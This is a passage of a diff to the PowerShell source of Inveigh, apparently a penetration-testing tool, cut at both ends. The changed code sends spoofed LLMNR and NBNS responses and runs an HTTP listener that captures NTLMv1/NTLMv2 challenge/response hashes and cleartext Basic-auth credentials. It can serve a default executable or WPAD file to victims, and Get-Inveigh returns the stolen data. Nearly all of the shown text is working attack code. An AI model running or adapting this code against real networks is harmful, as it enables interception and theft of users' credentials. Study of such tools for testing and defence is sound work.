- if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old)
+ if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $HTTP_source_IP -eq $HTTP_request_remote_endpoint_old)
{
$HTTP_raw_url_output = $false
}
@@ -1097,12 +1098,12 @@ $HTTP_scriptblock =
if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)
{
- $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
+ $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")])
}
$HTTP_request_raw_url_old = $inveigh.request.RawUrl
- $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address
+ $HTTP_request_remote_endpoint_old = $HTTP_source_IP
$HTTP_request_time_old = $HTTP_request_time
[String]$authentication_header = $inveigh.request.headers.GetValues('Authorization')
@@ -1113,19 +1114,19 @@ $HTTP_scriptblock =
[Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
$inveigh.response.StatusCode = 401
- if($HTTP_request_bytes[8] -eq 1)
+ if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
$inveigh.response.StatusCode = 401
- $NTLM = NTLMChallengeBase64
+ $NTLM = NTLMChallengeBase64 $Challenge
}
- elseif($HTTP_request_bytes[8] -eq 3)
+ elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
$NTLM = 'NTLM'
$HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
$HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
$HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
$HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
- [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
+ [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $inveigh.request.RemoteEndpoint.Port + '*'
$inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
$NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
@@ -1154,27 +1155,27 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
$inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash)
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)
$inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
}
- if($inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if($inveigh.NTLMv1_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.NTLMv1_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
}
}
@@ -1192,38 +1193,38 @@ $HTTP_scriptblock =
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
$inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash)
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))))
{
$inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)
$inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
}
- if($inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if($inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.NTLMv2_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
}
}
}
- if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
+ if($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
{
- $inveigh.IP_capture_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString)
+ $inveigh.IP_capture_list.Add($HTTP_source_IP)
}
$inveigh.response.StatusCode = 200
$NTLM_auth = $true
- $NTLM_challenge = ''
+ $NTLM_challenge = ""
$HTTP_raw_url_output = $true
}
@@ -1239,10 +1240,10 @@ $HTTP_scriptblock =
$basic_auth = $true
$authentication_header = $authentication_header -replace 'Basic ',''
$cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.Address)])
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")])
$inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials")
$inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.Address)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
if($inveigh.file_output)
{
@@ -1254,35 +1255,35 @@ $HTTP_scriptblock =
if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth)
{
- if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)))
+ if($HTTPDir -and $HTTPDefaultEXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)))
{
- [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE))
}
- elseif($inveigh.HTTP_directory)
+ elseif($HTTPDir)
{
- if($inveigh.HTTP_default_file -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat')
+ if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat')
{
- [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
- elseif($inveigh.HTTP_default_file -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)))
+ elseif($HTTPDefaultFile -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)))
{
- [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
- elseif($inveigh.WPAD_response -and $inveigh.request.RawUrl -match '/wpad.dat')
+ elseif($WPADResponse -and $inveigh.request.RawUrl -match '/wpad.dat')
{
- [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response)
+ [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse)
}
else
{
- if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
+ if(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl))
{
- [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $inveigh.request.RawUrl))
}
else
{
- [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response)
+ [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse)
}
}
@@ -1293,11 +1294,11 @@ $HTTP_scriptblock =
if($inveigh.request.RawUrl -match '/wpad.dat')
{
- $inveigh.message = $inveigh.WPAD_response
+ $inveigh.message = $WPADResponse
}
- elseif($inveigh.HTTP_response)
+ elseif($HTTPResponse)
{
- $inveigh.message = $inveigh.HTTP_response
+ $inveigh.message = $HTTPResponse
}
else
{
@@ -1360,18 +1361,18 @@ $sniffer_scriptblock =
$LLMNR_learning_log = New-Object System.Collections.Generic.List[string]
$NBNS_learning_log = New-Object System.Collections.Generic.List[string]
- if($RunTime)
- {
- $sniffer_timeout = New-TimeSpan -Minutes $RunTime
- $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
if($SpooferLearningDelay)
{
$spoofer_learning_delay = New-TimeSpan -Minutes $SpooferLearningDelay
$spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
+ if($RunTime)
+ {
+ $sniffer_timeout = New-TimeSpan -Minutes $RunTime
+ $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
while($inveigh.running)
{
$packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None)
@@ -1638,20 +1639,20 @@ $sniffer_scriptblock =
if($NBNSTypes -contains $NBNS_query_type)
{
- if (($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
+ if(($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and (
- $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)))
+ $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP))
{
- if($SpooferLearning -eq 'N' -or [System.BitConverter]::ToString($NBNS_transaction_ID_bytes) -ne [System.BitConverter]::ToString($payload_bytes[0..1]))
+ if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
$NBNS_send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp)
$NBNS_send_socket.SendBufferSize = 1024
$NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
$NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
$NBNS_send_socket.Close()
- $NBNS_response_message = "- spoofed response has been sent"
+ $NBNS_response_message = "- response sent"
}
else
{
@@ -1694,6 +1695,14 @@ $sniffer_scriptblock =
{
$NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
}
+ elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+ {
+ $NBNS_response_message = "- request is local"
+ }
+ elseif($source_IP -eq $IP -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+ {
+ $NBNS_request_ignore = $true
+ }
else
{
$NBNS_response_message = "- something went wrong"
@@ -1704,7 +1713,7 @@ $sniffer_scriptblock =
}
else
{
- $NBNS_response_message = "- spoof not sent due to disabled type"
+ $NBNS_response_message = "- disabled NBNS type"
}
}
@@ -1770,7 +1779,7 @@ $sniffer_scriptblock =
if($LLMNR -eq 'Y')
{
- if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $LLMNR_query_string -and $source_IP -ne $IP)
+ if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -contains $LLMNR_query_string -and $source_IP -ne $IP)
{
if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"})))
@@ -1825,14 +1834,14 @@ $sniffer_scriptblock =
$SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)))
{
- if($SpooferLearning -eq 'N' -or [System.BitConverter]::ToString($LLMNR_transaction_ID_bytes) -ne [System.BitConverter]::ToString($payload_bytes[0..1]))
+ if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
$LLMNR_send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
$LLMNR_send_socket.SendBufferSize = 1024
$LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
$LLMNR_send_socket.Close()
- $LLMNR_response_message = "- spoofed response has been sent"
+ $LLMNR_response_message = "- response sent"
}
else
{
@@ -2047,9 +2056,9 @@ function HTTPListener()
$HTTP_powershell = [PowerShell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument(
- $HTTPBasicRealm).AddArgument($WPADAuth) > $null
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
+ $HTTPBasicRealm).AddArgument($HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument(
+ $HTTPDir).AddArgument($HTTPResponse).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -2267,109 +2276,163 @@ if($inveigh.console_output)
function Stop-Inveigh
{
- <#
- .SYNOPSIS
- Stop-Inveigh will stop all running Inveigh functions.
- #>
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+if($inveigh)
+{
- if($inveigh)
+ if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
{
- if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+
+ if($inveigh.HTTP_listener.IsListening)
{
+ $inveigh.HTTP_listener.Stop()
+ $inveigh.HTTP_listener.Close()
+ }
+
+ if($inveigh.unprivileged_running)
+ {
+ $inveigh.unprivileged_running = $false
+ Start-Sleep -s 5
+ Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
- if($inveigh.HTTP_listener.IsListening)
+ if($inveigh.file_output)
{
- $inveigh.HTTP_listener.Stop()
- $inveigh.HTTP_listener.Close()
+ "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
}
-
- if($inveigh.unprivileged_running)
- {
- $inveigh.unprivileged_running = $false
- Start-Sleep -s 5
- Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
- }
- }
+ }
- if($inveigh.relay_running)
+ if($inveigh.relay_running)
+ {
+ $inveigh.relay_running = $false
+ Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+
+ if($inveigh.file_output)
{
- $inveigh.relay_running = $false
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+ "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+ }
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
- }
+ }
- }
+ if($inveigh.running)
+ {
+ $inveigh.running = $false
+ Write-Output("Inveigh exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
- if($inveigh.running)
+ if($inveigh.file_output)
{
- $inveigh.running = $false
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+ "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+ }
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
- }
+ }
- }
+ }
+ else
+ {
+ Write-Output("There are no running Inveigh functions")
+ }
+
+ if($inveigh.HTTPS)
+ {
+ & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
- }
- else
+ try
{
- Write-Output("There are no running Inveigh functions")
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
+ $certificate_store.Remove($certificate)
+ $certificate_store.Close()
}
-
- if($inveigh.HTTPS)
+ catch
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- try
+ if($inveigh.file_output)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
}
- catch
- {
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
- }
-
- }
}
-
- $inveigh.HTTP = $false
- $inveigh.HTTPS = $false
- }
- else
- {
- Write-Output("There are no running Inveigh functions")|Out-Null
}
+ $inveigh.HTTP = $false
+ $inveigh.HTTPS = $false
+}
+else
+{
+ Write-Output("There are no running Inveigh functions")|Out-Null
+}
+
}
function Get-Inveigh
{
- <#
- .SYNOPSIS
- Get-Inveigh will display queued Inveigh console output.
- #>
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set.
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+#>
+
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($Console -or $PSBoundParameters.Count -eq 0)
+{
while($inveigh.console_queue.Count -gt 0)
{
@@ -2428,279 +2491,200 @@ function Get-Inveigh
}
-function Get-InveighCleartext
+if($Log)
{
- <#
- .SYNOPSIS
- Get-InveighCleartext will get all captured cleartext credentials.
-
- .PARAMETER Unique
- Display only unique cleartext credentials.
- #>
-
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
- )
-
- if($Unique)
- {
- Write-Output $inveigh.cleartext_list | Get-Unique
- }
- else
- {
- Write-Output $inveigh.cleartext_list
- }
-
+ Write-Output $inveigh.log
}
-function Get-InveighNTLMv1
+if($NTLMv1)
{
- <#
- .SYNOPSIS
- Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes.
-
- .PARAMETER Unique
- Display only the first captured challenge/response for each unique account.
-
- .PARAMETER Usernames
- Display IP addresses and usernames for captured NTLMv2 challenge response hashes.
- #>
-
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(Mandatory=$false)][Switch]$Usernames,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
- )
-
- if ($invalid_parameter)
- {
- throw "$($invalid_parameter) is not a valid parameter."
- }
+ Write-Output $inveigh.NTLMv1_list
+}
- if($Unique -and $Usernames)
- {
- throw "Cannot use -Unique with -Usernames."
- }
+if($NTLMv1Unique)
+{
+ $inveigh.NTLMv1_list.Sort()
- if($Unique)
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
{
